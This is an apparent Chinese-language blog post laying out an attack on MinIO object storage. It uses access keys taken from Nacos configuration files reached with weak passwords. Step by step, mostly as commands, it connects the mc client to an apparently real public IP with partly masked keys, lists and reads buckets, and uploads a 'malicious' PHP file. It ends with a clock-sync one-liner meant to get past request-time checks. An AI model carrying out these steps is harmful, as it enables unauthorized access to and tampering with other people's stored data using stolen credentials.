Featured image of post 【Minio】云存储服务接口攻击技巧

【Minio】云存储服务接口攻击技巧

文章共847字

0x00 介绍

Minio是一款高性能的对象存储服务,支持Amazon S3云存储服务接口。

0x01 攻击条件

当我们挖掘nacos漏洞时,使用弱口令进入到系统后,这里会有很多配置文件,这些配置文件会记录一些敏感信息。
敏感信息如下:

1
2
3
4
5
rabbit
redis
mysql
minio
ak/sk

0x02 条件

image.png

0x03 利用

如何利用起来呢?
这里就说一下minio怎么进行攻击利用。
首先我们需要先安装一下mc工具
这里我直接使用kali进行安装

1
wget https://dl.min.io/client/mc/release/linux-amd64/mc

image.png
赋予执行权限并移动到系统路径

1
2
chmod +x mc          # 赋予可执行权限
sudo mv mc /usr/local/bin/  # 移动到系统 PATH 路径,方便全局调用

验证安装

1
2
mc --version
# 示例输出:mc version RELEASE.2024-05-08T17-11-57Z (commit-id=...)

安装完成后,即可在 Kali 终端中执行你提供的命令:

1
mc alias set my-minio http://125.34.90.154:9000 PWjVFMxxxxkakthh Lm4I01IQd5OX1xxxxx45UlascuH

这条命令怎么来的呢?

1
2
3
4
set my-minio:设置一个名字
http://125.34.90.154:9000:路径
PWjVFxxxMkakthh:access-key
Lm4I01IQd5OXxxxscuH:secret-key

这里可以看到nacos里的配置:
image.png
如果所有配置正常这里会回显成功。
image.png
如果配置错误这里也会显示错误提示。
image.png
看一下这个里面有什么文件,可以看到这里有4个文件夹。

1
mc ls my-minio/

image.png
然后我们先看第一个文件夹里面有什么数据:

1
mc ls my-minio/solicitation

image.png
然后再随便跟一个文件夹,看一下有什么东西没:
image.png
可以看到有一个1.png文件。
然后直接访问这个路径,记得把my-minio删掉,发现可以直接显示图片。
image.png
然后我们尝试是否能文件上传到桶里面:
首先创建一个文件。
image.png
上传恶意文件
这里你可以随便上传到哪里,反正有目录了。

1
mc cp test.php my-minio/solicitation/

image.png
可以看到已经上传成功了。
访问一下这个路径,

1
solicitation/test.php

image.png
发现直接下载,并没有解析。
删除

1
mc rm --force test.php

image.png

0x04 绕过技巧

1
2
3
SERVER_TIME=$(curl -s -I "[http://127.0.0.1:9000"](http://125.34.90.154:9000/") | grep -i "date:" | cut -d':' -f2- | sed 's/^ *//'); sudo date -s "$SERVER_TIME" && ./mc ls my-minio/solicitation
这个命令主要是绕过/mc ls my-minio/solicitation可以在这个地方添加命令。
如果你仔细的情况下可以观察到:SERVER_TIME=$(curl -s -I "[http://127.0.0.1:9000"](http://125.34.90.154:9000/") | grep -i "date:" | cut -d':' -f2- | sed 's/^ *//'); sudo date -s "$SERVER_TIME" 前面无论如何都是这种命令,因为帮助我们绕过,后面只需跟&& 然后mc基础命令即可。

image.png

站点已运行计算中...